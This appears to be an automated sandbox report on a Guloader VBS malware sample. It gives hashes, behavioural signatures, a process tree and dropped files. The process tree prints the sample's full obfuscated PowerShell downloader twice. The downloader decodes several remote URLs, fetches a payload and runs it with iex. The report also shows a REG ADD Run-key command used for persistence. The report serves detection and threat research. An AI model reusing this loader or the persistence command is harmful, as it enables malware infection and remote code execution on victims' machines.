Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-07-2024 02:26

General

  • Target

    e33fda9ea628ee0efe54b54a20a9e6aff7cd64d293f3b67c71f11d3035c17764.vbs

  • Size

    102KB

  • MD5

    b7967a2db392f9d8694734c554f06183

  • SHA1

    0386c4437465eb5bd4c6a21938e99af3c9f748c7

  • SHA256

    e33fda9ea628ee0efe54b54a20a9e6aff7cd64d293f3b67c71f11d3035c17764

  • SHA512

    89223646bfb92ccf336c539f82fbab7f4e0cb35aab0779631702319504590947480338443f991500b6e3044d4d3c3cef30b45558f8382fa05e9a780426e1e8e5

  • SSDEEP

    3072:h4oGKaBSPReHzR0WAjT28fyxa+CS64B9Ou4rIQCtvvNZ:2t7SPReHd0WoT28faa+CS64mu8IQCtvn

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e33fda9ea628ee0efe54b54a20a9e6aff7cd64d293f3b67c71f11d3035c17764.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3620
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Pariaers Slvfadene Frgemnds Salpetersyrefabrikken205 Blidhedens114 Feriegiros Austerer Unpendant Bestialiteter Polyethers Linkedit Endkkerne Threaded Produktions Keratoconus Cdu Overdredging Thormunds Margenlinier21 Halvkvdet86 varmeslangebekendtgrelsers Flickered Omklamret Chalybeous233 Pariaers Slvfadene Frgemnds Salpetersyrefabrikken205 Blidhedens114 Feriegiros Austerer Unpendant Bestialiteter Polyethers Linkedit Endkkerne Threaded Produktions Keratoconus Cdu Overdredging Thormunds Margenlinier21 Halvkvdet86 varmeslangebekendtgrelsers Flickered Omklamret Chalybeous233';If (${host}.CurrentCulture) {$Ophthalmology++;}Function Irksome244($Albuebenenes){$Loto=$Albuebenenes.Length-$Ophthalmology;$Mytologiernes='SUBsTR';$Mytologiernes+='ing';For( $Tilkbenes=1;$Tilkbenes -lt $Loto;$Tilkbenes+=2){$Pariaers+=$Albuebenenes.$Mytologiernes.Invoke( $Tilkbenes, $Ophthalmology);}$Pariaers;}function lineable($Capito){ & ($Rverbanders) ($Capito);}$Proreptilian=Irksome244 ' M o z i.lFlAaF/N5 ..0 S(CW iOnSd,o,w.s, DNBT P1K0 .P0 ;, ,WFi.n 6 4 ;. .x 6 4 ;s r vK:N1,2 1 .V0G). FG,eNcTk o / 2.0E1,0.0 1 0F1S ,F i r,e f,oYxP/P1 2 1H..0S ';$Avenida=Irksome244 ' UKsVe r,- ACgSeAn tP ';$Blidhedens114=Irksome244 'Hh t.tUp.sU: /./BmLial a nkaAc,eTsA. cUoDm./.S,eLr,o s.a,.,m i.x.>Bh tct p s :B/R/.m o,vDike s mDa,cAk taa,lNk ..cDo mP/ S.eArgo s a,. mfi,x > h t tEp s : /n/DfSiSr s tO4.l oTc.kasum.i t h,sP. cIo .,u k,/KSDe,r oFs a..CmUi xA> hUt tSpU:,/K/ 1,0P3m.C1 9R5 ..2H3A7 .,4,3 /.S eCr o s aP..mPiTxS ';$Torqueses=Irksome244 ' >D ';$Rverbanders=Irksome244 '.iTeux, ';$razoring='Unpendant';$Scribblage = Irksome244 ' e.c h o V%KaHp pAd a tUa %d\BKAu bRi kDc e n.tni m eUt e.r ..GTuaa ,&.&T Ne.c hToM Ct ';lineable (Irksome244 'M$.gFlCoTbDaEl :.IGn,tLe.r f r.e tNtme ds=K(KcVmSd. ,/.ck $SS.c r iMbSbMlsa gBeG) ');lineable (Irksome244 'L$PgAl oUbTaulA:ISBa.lEp eLtSeVr,sUy rveRf aTbkr i.kSk ednM2A0 5,= $SB,lKiFd h e d,eCnGs 1 1 4b.cs p.l,i,t (.$RT ogrFqru eTs,e sF)L ');lineable (Irksome244 'b[ N.e t.. Sge r v iScDe.P oCiSnStFMFa,n,aHg e,rG],: :FSMe,c uSr.i tGyUP,rMo t o.c oPl P=D B[PNTe,t .aSRe cUuSr i tSyIPOrpo.t oBc.oAlHTmy p eD] : :UT lBsb1R2U ');$Blidhedens114=$Salpetersyrefabrikken205[0];$Carmelite= (Irksome244 'N$ gml oKb a lB:MMIe,t a l ukd l sOe,r.e = NReIwS-.O.b jSe c t ,STy sBt e m .FN eTt .EWFe bUC,lpiSebn t');$Carmelite+=$Interfretted[1];lineable ($Carmelite);lineable (Irksome244 ',$,M eStMaFlRuTdSlDsPe r e,.,HNeWaMd e r s [H$ A v eun ied,aT] =,$SPTrAoMr eFp t iBl,i aPnO ');$Saxten=Irksome244 'B$ M eLtEa l uIdYlis e,r eM.FD oSw nSl.o,a.d F iSlse ( $UBUlTi,dTh.e.dRe n,s,1S1G4 , $ F lDi.c k.eCrMe.d ), ';$Flickered=$Interfretted[0];lineable (Irksome244 ',$,gDlmoabRaSl,:,GCr.a,nAoapAhDyTrseB= (lT eTs,tM-,P a t h P$OFelCi c k e r e dB)N ');while (!$Granophyre) {lineable (Irksome244 ' $Dg l o.b a.l : rMe vKo,l,uGt iRoInssAr.a a dFeAnceZ=P$.tGr,uMe ') ;lineable $Saxten;lineable (Irksome244 '.S t,aErFt.- SSl e,e pr D4, ');lineable (Irksome244 'B$Ug,l.o.bPaLl.: GCr aSnCo p hBy r.e,=S(ATKeJs t -SPSa t hA .$,F,l i.c,kFe.rFeLd,) ') ;lineable (Irksome244 'M$ gSlIoSb a lP: F,rUg,e.mFnPd sS=I$fg,lAoHbNaBll:cSPl v.f.a d.e,n eF+ + %.$FS a l p.eUtSeurTsCyLrOeHf.aHb rBiEkPk.e nS2G0G5..Sc o.uVn t ') ;$Blidhedens114=$Salpetersyrefabrikken205[$Frgemnds];}$Kriminologernes=339584;$Resummoned84=26675;lineable (Irksome244 'M$Mg lMo.b a,lS: B.e,sAt i aBlGi t.e tSeRrA =E GBeAtD-ACMo n.t eEn t O$ FAl i c,k,eNrKe dM ');lineable (Irksome244 'B$ g l oAb,aOlR:DW,a v.e mMe n tW .=. U[ S yTs.tReKm .,C o nBv eArNtP]P:.: FPr,oBm BPa sAe 6R4 S t,r isn g (t$SB,eCs tSiCa,l iHt eTt.e.rM) ');lineable (Irksome244 'A$ g l o,bZaFl.:IEVn dFkSkEe rPnFe =, ,[HSSyls tLe mB.STSeSxTt,.PE n,c oBd iSn g ]P:R:PAUSMCUI I .,GBe,tUS t,r,i n.gP(P$ W a.vCe mTe n.t ) ');lineable (Irksome244 '.$ gPlTo bAaJlC:HCQhSoNu,t.=S$,E nMd kTkGe,r,n e ..sSuab s t rUi nEg ( $BKKrNi m iPnSo,lloPgSe,rSn,ePs ,H$ RLe.sHukm m oLnDeKd,8,4 ) ');lineable $Chout;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1044
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kubikcentimeter.Gua && echo t"
        3⤵
          PID:1172
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Pariaers Slvfadene Frgemnds Salpetersyrefabrikken205 Blidhedens114 Feriegiros Austerer Unpendant Bestialiteter Polyethers Linkedit Endkkerne Threaded Produktions Keratoconus Cdu Overdredging Thormunds Margenlinier21 Halvkvdet86 varmeslangebekendtgrelsers Flickered Omklamret Chalybeous233 Pariaers Slvfadene Frgemnds Salpetersyrefabrikken205 Blidhedens114 Feriegiros Austerer Unpendant Bestialiteter Polyethers Linkedit Endkkerne Threaded Produktions Keratoconus Cdu Overdredging Thormunds Margenlinier21 Halvkvdet86 varmeslangebekendtgrelsers Flickered Omklamret Chalybeous233';If (${host}.CurrentCulture) {$Ophthalmology++;}Function Irksome244($Albuebenenes){$Loto=$Albuebenenes.Length-$Ophthalmology;$Mytologiernes='SUBsTR';$Mytologiernes+='ing';For( $Tilkbenes=1;$Tilkbenes -lt $Loto;$Tilkbenes+=2){$Pariaers+=$Albuebenenes.$Mytologiernes.Invoke( $Tilkbenes, $Ophthalmology);}$Pariaers;}function lineable($Capito){ & ($Rverbanders) ($Capito);}$Proreptilian=Irksome244 ' M o z i.lFlAaF/N5 ..0 S(CW iOnSd,o,w.s, DNBT P1K0 .P0 ;, ,WFi.n 6 4 ;. .x 6 4 ;s r vK:N1,2 1 .V0G). FG,eNcTk o / 2.0E1,0.0 1 0F1S ,F i r,e f,oYxP/P1 2 1H..0S ';$Avenida=Irksome244 ' UKsVe r,- ACgSeAn tP ';$Blidhedens114=Irksome244 'Hh t.tUp.sU: /./BmLial a nkaAc,eTsA. cUoDm./.S,eLr,o s.a,.,m i.x.>Bh tct p s :B/R/.m o,vDike s mDa,cAk taa,lNk ..cDo mP/ S.eArgo s a,. mfi,x > h t tEp s : /n/DfSiSr s tO4.l oTc.kasum.i t h,sP. cIo .,u k,/KSDe,r oFs a..CmUi xA> hUt tSpU:,/K/ 1,0P3m.C1 9R5 ..2H3A7 .,4,3 /.S eCr o s aP..mPiTxS ';$Torqueses=Irksome244 ' >D ';$Rverbanders=Irksome244 '.iTeux, ';$razoring='Unpendant';$Scribblage = Irksome244 ' e.c h o V%KaHp pAd a tUa %d\BKAu bRi kDc e n.tni m eUt e.r ..GTuaa ,&.&T Ne.c hToM Ct ';lineable (Irksome244 'M$.gFlCoTbDaEl :.IGn,tLe.r f r.e tNtme ds=K(KcVmSd. ,/.ck $SS.c r iMbSbMlsa gBeG) ');lineable (Irksome244 'L$PgAl oUbTaulA:ISBa.lEp eLtSeVr,sUy rveRf aTbkr i.kSk ednM2A0 5,= $SB,lKiFd h e d,eCnGs 1 1 4b.cs p.l,i,t (.$RT ogrFqru eTs,e sF)L ');lineable (Irksome244 'b[ N.e t.. Sge r v iScDe.P oCiSnStFMFa,n,aHg e,rG],: :FSMe,c uSr.i tGyUP,rMo t o.c oPl P=D B[PNTe,t .aSRe cUuSr i tSyIPOrpo.t oBc.oAlHTmy p eD] : :UT lBsb1R2U ');$Blidhedens114=$Salpetersyrefabrikken205[0];$Carmelite= (Irksome244 'N$ gml oKb a lB:MMIe,t a l ukd l sOe,r.e = NReIwS-.O.b jSe c t ,STy sBt e m .FN eTt .EWFe bUC,lpiSebn t');$Carmelite+=$Interfretted[1];lineable ($Carmelite);lineable (Irksome244 ',$,M eStMaFlRuTdSlDsPe r e,.,HNeWaMd e r s [H$ A v eun ied,aT] =,$SPTrAoMr eFp t iBl,i aPnO ');$Saxten=Irksome244 'B$ M eLtEa l uIdYlis e,r eM.FD oSw nSl.o,a.d F iSlse ( $UBUlTi,dTh.e.dRe n,s,1S1G4 , $ F lDi.c k.eCrMe.d ), ';$Flickered=$Interfretted[0];lineable (Irksome244 ',$,gDlmoabRaSl,:,GCr.a,nAoapAhDyTrseB= (lT eTs,tM-,P a t h P$OFelCi c k e r e dB)N ');while (!$Granophyre) {lineable (Irksome244 ' $Dg l o.b a.l : rMe vKo,l,uGt iRoInssAr.a a dFeAnceZ=P$.tGr,uMe ') ;lineable $Saxten;lineable (Irksome244 '.S t,aErFt.- SSl e,e pr D4, ');lineable (Irksome244 'B$Ug,l.o.bPaLl.: GCr aSnCo p hBy r.e,=S(ATKeJs t -SPSa t hA .$,F,l i.c,kFe.rFeLd,) ') ;lineable (Irksome244 'M$ gSlIoSb a lP: F,rUg,e.mFnPd sS=I$fg,lAoHbNaBll:cSPl v.f.a d.e,n eF+ + %.$FS a l p.eUtSeurTsCyLrOeHf.aHb rBiEkPk.e nS2G0G5..Sc o.uVn t ') ;$Blidhedens114=$Salpetersyrefabrikken205[$Frgemnds];}$Kriminologernes=339584;$Resummoned84=26675;lineable (Irksome244 'M$Mg lMo.b a,lS: B.e,sAt i aBlGi t.e tSeRrA =E GBeAtD-ACMo n.t eEn t O$ FAl i c,k,eNrKe dM ');lineable (Irksome244 'B$ g l oAb,aOlR:DW,a v.e mMe n tW .=. U[ S yTs.tReKm .,C o nBv eArNtP]P:.: FPr,oBm BPa sAe 6R4 S t,r isn g (t$SB,eCs tSiCa,l iHt eTt.e.rM) ');lineable (Irksome244 'A$ g l o,bZaFl.:IEVn dFkSkEe rPnFe =, ,[HSSyls tLe mB.STSeSxTt,.PE n,c oBd iSn g ]P:R:PAUSMCUI I .,GBe,tUS t,r,i n.gP(P$ W a.vCe mTe n.t ) ');lineable (Irksome244 '.$ gPlTo bAaJlC:HCQhSoNu,t.=S$,E nMd kTkGe,r,n e ..sSuab s t rUi nEg ( $BKKrNi m iPnSo,lloPgSe,rSn,ePs ,H$ RLe.sHukm m oLnDeKd,8,4 ) ');lineable $Chout;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1540
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kubikcentimeter.Gua && echo t"
            4⤵
              PID:2028
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:2264
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Svumpukler" /t REG_EXPAND_SZ /d "%Tekstmarkeringens130% -w 1 $Beholdtes=(Get-ItemProperty -Path 'HKCU:\Darrick\').Huldre;%Tekstmarkeringens130% ($Beholdtes)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1836
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Svumpukler" /t REG_EXPAND_SZ /d "%Tekstmarkeringens130% -w 1 $Beholdtes=(Get-ItemProperty -Path 'HKCU:\Darrick\').Huldre;%Tekstmarkeringens130% ($Beholdtes)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:2280

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vtczaukc.pnc.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\Kubikcentimeter.Gua

        Filesize

        476KB

        MD5

        8fc3031fccbd90ac8beb25c3ce089816

        SHA1

        95e5412e39afc737103ab2e516642e9952c366e9

        SHA256

        7ab6a49072545cc0f6da993333894c81fee597e41129379d30c3b4f249667343

        SHA512

        8852b4efe8f23c6c01b0a500eacb1d8ce38426516da706435addd641cd1b32d024109f1d6a123b9672f173362caae707f87dbb2a8f32ec3325d3a9e5bd43f11b

      • memory/1044-1-0x000001D6C58F0000-0x000001D6C5912000-memory.dmp

        Filesize

        136KB

      • memory/1044-11-0x00007FF8A22F0000-0x00007FF8A2DB1000-memory.dmp

        Filesize

        10.8MB

      • memory/1044-12-0x00007FF8A22F0000-0x00007FF8A2DB1000-memory.dmp

        Filesize

        10.8MB

      • memory/1044-50-0x00007FF8A22F0000-0x00007FF8A2DB1000-memory.dmp

        Filesize

        10.8MB

      • memory/1044-0-0x00007FF8A22F3000-0x00007FF8A22F5000-memory.dmp

        Filesize

        8KB

      • memory/1044-41-0x00007FF8A22F0000-0x00007FF8A2DB1000-memory.dmp

        Filesize

        10.8MB

      • memory/1044-40-0x00007FF8A22F3000-0x00007FF8A22F5000-memory.dmp

        Filesize

        8KB

      • memory/1540-16-0x0000000005870000-0x0000000005E98000-memory.dmp

        Filesize

        6.2MB

      • memory/1540-35-0x0000000007860000-0x0000000007882000-memory.dmp

        Filesize

        136KB

      • memory/1540-30-0x0000000006820000-0x000000000683E000-memory.dmp

        Filesize

        120KB

      • memory/1540-31-0x0000000006850000-0x000000000689C000-memory.dmp

        Filesize

        304KB

      • memory/1540-32-0x0000000008190000-0x000000000880A000-memory.dmp

        Filesize

        6.5MB

      • memory/1540-33-0x0000000006D70000-0x0000000006D8A000-memory.dmp

        Filesize

        104KB

      • memory/1540-34-0x0000000007B10000-0x0000000007BA6000-memory.dmp

        Filesize

        600KB

      • memory/1540-29-0x0000000006200000-0x0000000006554000-memory.dmp

        Filesize

        3.3MB

      • memory/1540-36-0x0000000008810000-0x0000000008DB4000-memory.dmp

        Filesize

        5.6MB

      • memory/1540-19-0x00000000060D0000-0x0000000006136000-memory.dmp

        Filesize

        408KB

      • memory/1540-38-0x0000000008DC0000-0x000000000DE14000-memory.dmp

        Filesize

        80.3MB

      • memory/1540-18-0x0000000005FB0000-0x0000000006016000-memory.dmp

        Filesize

        408KB

      • memory/1540-17-0x0000000005F10000-0x0000000005F32000-memory.dmp

        Filesize

        136KB

      • memory/1540-15-0x0000000005200000-0x0000000005236000-memory.dmp

        Filesize

        216KB

      • memory/2264-48-0x0000000001E40000-0x0000000006E94000-memory.dmp

        Filesize

        80.3MB